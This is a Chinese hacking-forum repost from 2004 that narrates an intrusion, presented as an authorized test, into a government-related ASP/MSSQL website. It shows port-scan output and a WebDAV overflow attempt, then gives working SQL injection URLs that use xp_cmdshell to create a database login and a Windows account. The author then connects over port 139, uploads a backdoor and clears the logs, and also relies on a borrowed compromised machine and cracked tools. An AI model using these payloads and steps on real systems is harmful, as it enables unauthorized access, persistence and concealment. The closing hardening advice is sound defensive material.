|
 | 作者: BrideX [bridex]
 论坛用户 |
登录 |
| 一次完整的入侵检测 此文属于RHC-安全技术小组所有,转载请不要修改内容。 一、 声明: 应朋友的要求,对其网站进行安全检测,查找系统漏洞。本文的目的不是要教大家入侵,是让管理员朋友有安全防范意识。如果读者利用此文攻击方法攻击其他网站,作者不承担任何责任。因此文的目的不是学习入侵方法,很大程度上是教大家入侵的步骤和入侵所有的耐心,所以隐去了我朋友的网站名字。文中所提到的网站纯属虚构,如有雷同,纯属巧合。 法律顾问:中国法律咨询站点二、 正文: 一次在Q上,好朋友让我为他的网站来次模拟进攻,测试一下其网站的安全性。要求是得到最高权限,查看漏洞所在。在得到批准的情况下我答应了他的请求。第2天晚上开始对其网站进行检测: 目标:取得管理员权限,在网站中留一个网页,收集漏洞情况。 计划:第一天进行踩点,第二天测试进攻,第三天看看网站的论坛……最终取得管理员权限。 1. 好久没有入侵了,很多都不会了,不过步骤还是要的。首先进行踩点(我踩踩踩!!),当然不是盲目的去扫描,先ping了一下他的网站。 Ping www.inday.com Pinging www.inday.com [210.10.10.10] with 32 bytes of data: Reply from 210.10.10.10: bytes=32 time=60ms TTL=115 Reply from 210.10.10.10: bytes=32 time=50ms TTL=115 Reply from 210.10.10.10: bytes=32 time=50ms TTL=115 Reply from 210.10.10.10: bytes=32 time=60ms TTL=115 Ping statistics for 210.10.10.10: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 50ms, Maximum = 60ms, Average = 55ms 恩,速度不错,看了看TTL看来有什么路由或者防火墙之类的。 打开浏览器,输入网址:http://www.inday.com 看了看,不错嘛,一个政府相关站点。稍微看了看,找到一个论坛,动网5.0的,网页采用asp的文章系统,不知道是哪个。可能有人会说用动网的洞直接得到密码就好拉,不错,这是一种方法,其实我是那里的管理员,想得到密码很容易,但此次入侵的目的就没达到了,所以我没用此方法。心想是如果实在不行,就利用动网的洞44。好,网站看好了,我在浏览器里输入了他的IP:210.10.10.10 晕!此页面无法显示。心想:不会吧,虚拟主机要我入侵,那怎么会是得到批准的呢??再说一般的虚拟主机都很稳定,管理员都非常负责。诶,管他呢,继续。 基本的探测可以了,下面请出扫描器。很多人会选用1种扫描器进行网站测试,但我不认为这样很好,因为很多扫描器都有自己的特性。比如x-scan的详细,流光的快,还有一些针对特定漏洞的扫描器等等。所以这次我采用了很多扫描器。 先我使用了流光5,不错吧,不要羡慕,我们联盟有下载,破解了时间和IP限制的。 OK,开始扫描,如果你不会,那你看看流光的帮助好了,本文不谈如何使用。榕哥的作品就是好,虽然不知道流光5是不是榕哥做的,但很多都是基于流光4.7的。没到4分钟,扫描完毕,查看扫描记录: 扫描 210.10.10.10 IIS5.0 NULL.Printer Exploit ...成功(不提了,从没成功过) PORT-> 主机 210.10.10.10 端口 0080 ...开放 PORT-> 主机 210.10.10.10 端口 0021 ...开放 (不错,如果是虚拟主机空间就可以暴力破解) PORT-> 主机 210.10.10.10 端口 0110 ...开放 PORT-> 主机 210.10.10.10 端口 0025 ...开放 FTP-> 主机 210.10.10.10 FTP 版本信息 ... Serv-U FTP Server v4.0 for WinSock ready...(据说有溢出漏洞,等会再说) PORT-> 主机 210.10.10.10 端口 0139 ...开放 (失望,这种端口都看得见) IIS-> 主机 210.10.10.10 IIS检测 FrontPage 扩展 ...成功 (老漏洞了,不过我没成功过) PLUGIN-> 扫描 210.10.10.10 IIS 5.0 WEBDAV Exploit ...成功 (我喜欢,不过成功率很小) PORT-> 主机 210.10.10.10 端口 0443 ...开放 PORT-> 主机 210.10.10.10 端口 1433 ...开放 (这个是关键点) 太让人失望了,一台服务器开了那么多端口不说还有那么多漏洞。从流光的扫描中我看到一份非常重要的信息。此机的计算机名就是网站名字,而且看到开放了1433端口,所以在此我确信为主机托管(老兄,托错人了)。 在这里我开始探测性的攻击了一次,使用的是webdav漏洞。 D:\>webdavx3.pl 210.10.10.10 IIS WebDAV overflow remote exploit by isno@xfocus.org start to try offset, if STOP a long time, you can press ^C and telnet 210.10.10.10 7788 try offset: 0 try offset: 1 try offset: 2 try offset: 3 ……………… 没有成功,这里我感到很奇怪,webdav的溢出程序对没打补丁的机器(因为都是些老漏洞,一开始以为没打什么补丁,害我走了很多弯路)怎么不起作用啊(先前认为的,后面才知道错了)。 今天的目的是踩点,所以这些资料是不够的,知己知彼,百战不殆。能有多的信息就尽量多。拿出x-scan进行探测……2分钟后,x-scan把我电脑资源吃光,被迫重启!◎¥◎#¥!◎#% 好,GUI不行那cmd进行扫描,2分钟后……x-scan又把我资源耗尽,再次重启。眼睛冒火了◎◎◎◎ 开启肉鸡,3389的,不错吧,在这里谢谢海兄提供肉鸡:) 好,在肉鸡上把该用的都下载来,先用x-scan扫描。机器好没办法,速度极快,大概10分钟后OK了。看看结果,呵呵,x-scan果然是好东西,比较具体。 /iishelp/iis/misc/iirturnh.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /scripts/samples/search/qfullhit.htw /scripts/samples/search/qsumrhit.htw /null.ida /null.idq /abczxv.htw /default.asp%81 /default.asp 一下子多了那么多CGI漏洞,而且还扫描出了一个令人兴奋的端口:3389。 OK,再次探测性攻击,打开终端连接器,填入端口,1,2,3,看见登入画面了。看看输入法。。。。。晕死,打好了,怎么会???开始疑惑了。算了,看看其他的吧。我把上面的漏洞找了遍,都没成功,看来运气不好,不过有一个漏洞到成功了,但是路径没猜对。/scripts/samples/search/qfullhit.htw 在绿盟的漏洞资料里查到这个漏洞存在着越界查看漏洞,就是说可以查看任意文件。可是。。。。因为不知道具体路进,都没成功,而且他的web站点放在了D盘,所以没有成功(事后知道的)。CGI啊CGI为什么我老不行呢?不相信,随后去了绿盟找了点EXPilot,编译后进行探测攻击,X,失败告终。。 难道非要我从论坛入手???我偏不要。冷静下来后我决定再次看看网页,随后又找了扫描器老大哥SSS进行扫描。 在观察网页种,无疑进入了下载页面,看来还没做好。无疑间我点了回首页的连接,晕,卡住了,看看连接地址,晕,file://d:/defual.asp 百密必有一疏,看到路径了,可。。。。两个盘符,跨盘符好像没提到,不管了,先试试吧,10分钟过去,依然不行,看来又走不通了。看看肉鸡的SSS扫描结果,老大哥就是老大哥,没话说,对于CGI的准确性非常厉害,那些漏洞虽然扫出来了,但前面有个X说明是个幌子,不过有一个,查找资料。绿盟竟然没有??那去google看看,找到几个,看了看漏洞介绍,针对iis4.0的,晕,白开心了,那怎么入手呢???? 看了看时间,2点了,明天上课,所以今天倒此了,不过目的达到了,毕竟今天的任务是踩点。睡觉先。第二天,晚上9点,呵呵,精神来了,继续昨天的排演。本来今天想整理下资料看看的,可还是不死心,又开始了扫描,结果一样。 刚想起来是有MSsql数据库的,找找最新的资料,看到MYSQL有溢出漏洞,编译了攻击程序,试验了下,结果是,失败:( 看看网页吧。 找到一个网管信箱,看看。。。。。。。是webclint邮件服务器,看看版本,晕,6.8的,我记得的漏洞是2.4的,看来又不行了,诶,真不甘心。看看文章系统吧,总觉得是免费的文章系统,不过是利用SQL数据库的。先看看他的查询: http://www.inday.com/gunye.asp?boardID=5 http://www.inday.com/news.asp?boardID=2 下面都雷同,只是asp页不同,关键语句是boardID,使用的查询语句可能是 "select * from where boardid="&boardid&"…… 后面我就猜不到了,再看看新闻页面 http://www.inday.com/ShowAnnounce.asp?boardID=2&RootID=1194&ID=1194&tion=7 标准的新闻系统,呵呵,那我们来44SQL 注入攻击看看。注意,SQL注入问题非常严重,请大家不要乱用下面的演示。相关资料网上已经有很多了,这里不再介绍。 我使用了http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin RHC进行查看,返回了语法错误,我再继续 http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin hax--,返回 ADODB.Recordset 错误 800a0cb3 当前记录集不支持书签。这可能是提供程序或选定的游标类型的限制。 /news.asp,行358 成功,yeah~~~~~~~~兴奋中!!! 然后我就一步一步添加了一个用户。哦,对了,还没说这个漏洞呢,这个漏洞是针对ASP+SQL的,一些asp页面没有进行过滤,使攻击者能执行任意命令,很简单,SQL我想大家都知道吧,如果得到用户密码就等于知道了这台主机的控制权。那我在SQL里创建一个本地用户没有问题吧,好我们来创建。以下程序很危险,请勿试。这里提一下,后面的―是SQL语句的注释,那后面的语句就不起作用了,嘿嘿。 http://www.inday.com/news.asp?id=2;exec master.dbo.sp_addlogin RHC;-- http://www.inday.com/news.asp?id=2;exec master.dbo.sp_password RHC,www.realhack.org;-- http://www.inday.com/news.asp?id=2;exec master.dbo.xp_cmdshell net user RHC www.realhack.org /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add;-- 哈哈,创建了一个RHC用户,密码为www.realhack.org。现在那个3389就可以用了,打开终端连接器,输入用户名和密码,OK,进入。。进入。。。进入。。。。。。。!!!!终端已经超过最大连接数。。。。。狂晕!!这时候我们的目的基本达到了,该是清理战场,然后写报告的时候了。既然3389不能进,但是139还开着,OK,net use 上去,我传了朋友做的一个后门程序,然后看了看他们的配置和web的存放位置,和我猜的没错,采用分盘管理。很严谨。在C盘,意外看见了w2ksp3补丁 ,看来先前的失败是有原因的。好了,清理日记,留了个页面告诉了我朋友一声。总结: 这次入侵一开始没有走对路线,一直以为什么补丁都没打,害的我走了很多弯路,在2天里找了很多溢出程序,但都一一失败。在中间我还使用了flashget的站点资源探测工具得到了非常有用的信息,站点的结构我都是从哪里得知的。其实一开始不想用SQL 注入问题来进行入侵的,但这次是安全检测,当然要全面些,所以用了最新搞到的资料。而且此问题只在ASP+SQL的服务器上才会有,一般的虚拟空间是不存在的。此问题相当严重,请不要随意破坏!!!国内主机!!!!我是得到入侵许可的情况下进行的攻击,如果使用上述方法进行破坏,本人不承担任何责任。 对于服务器的安全我也来说说,从一开始的扫描,我就认为他们的主机有问题(结果不是主机问题),一些不必要的端口开了,比如139,445,135等高危险端口都打开了,这是不应该的,至少也要进行防火墙的端口过滤吧。比如139,成了我成功的关键,因为在终端连接上不允许我连接,如果139没有开的话我可能还会费一些时日。其实问题不止一处,一些有问题的网页不应该放在主页上,比如上述说道的下载页面,完全可以让别人猜到路径,要知道物理路径对于一个攻击者来说是很重要的。目前最严重,谈论最多的莫过于SQL注入问题了,入侵的时候我把isno的SQL注入问题读了好几遍,高手就是高手,不像我这样的烂文章。后来我把他们的文章系统看了看,查询语句根本不存在任何过滤,使我感到很惊讶,听朋友说这个文章系统是花钱请专门的人修改一个免费文章系统的,竟然一点常识都没有,真是可悲。虽然SQL问题已经公开很久了,可是国内很多网站都存在问题,动网的洞一个接一个,LB的洞又接踵而来,真是令人发指啊。好了,就说到这里吧,有空可以到我们小组来看看,网址是:http://www.realhack.org再次申明:如用以上方法入侵服务器进行破坏的,一律与作者无关。法律顾问:中国法律咨询站点 -------------------------------------------------------------------------------- 相关文章 没有相关文章 |
| 地主 发表时间: 04-06-30 18:47 |
 | 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
为什么不著名转载? |
| B1层 发表时间: 04-06-30 18:56 |
| 回复: BrideX [bridex] 论坛用户 |
登录 |
|
标题转贴就行了呗!! |
| B2层 发表时间: 04-06-30 20:13 |
| 回复: eagle_1 [eagle_1] 论坛用户 |
登录 |
|
无聊~! |
| B3层 发表时间: 04-07-14 13:09 |
 | 回复: shengli [shengli]  论坛用户 |
登录 |
|
很不错! |
| B4层 发表时间: 04-07-14 20:45 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 一次完整的入侵检测[转贴]